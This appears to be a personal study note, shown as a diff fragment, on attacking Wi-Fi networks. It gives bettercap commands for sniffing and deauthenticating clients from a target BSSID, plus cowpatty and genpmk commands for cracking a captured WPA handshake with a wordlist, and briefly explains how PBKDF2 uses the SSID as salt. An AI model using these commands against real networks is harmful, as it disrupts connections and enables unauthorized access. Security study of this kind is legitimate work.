MuhammedZohaib/My-Second-Brain/Wifi.md

 > net.sniff on
 > wifi.deauth "bssid here"

+#cowpatty and genpmk work together as the genpmk takes the wordlist along with the ssid of wifi to convert the password list into PSKs of the that wifi network.
+Remeber the PSK key encryption for every network will be different the Name of the wifi "ssid" is used as the Salt to convert plain password into the PSK.
+It uses PBKDF2 algorithm to make PSK it takes passpharase along with ssid as salt and apply hasing algorithm number of times for generating hash.

 cowpatty -f "path to wordlist" -r "packet capture file" -s "ssid" genpmk -f "path to wordlist" -d "output file name" -s "ssid" cowpatty -d "hash file from genpmk" -r "packet capture file" -s "ssid"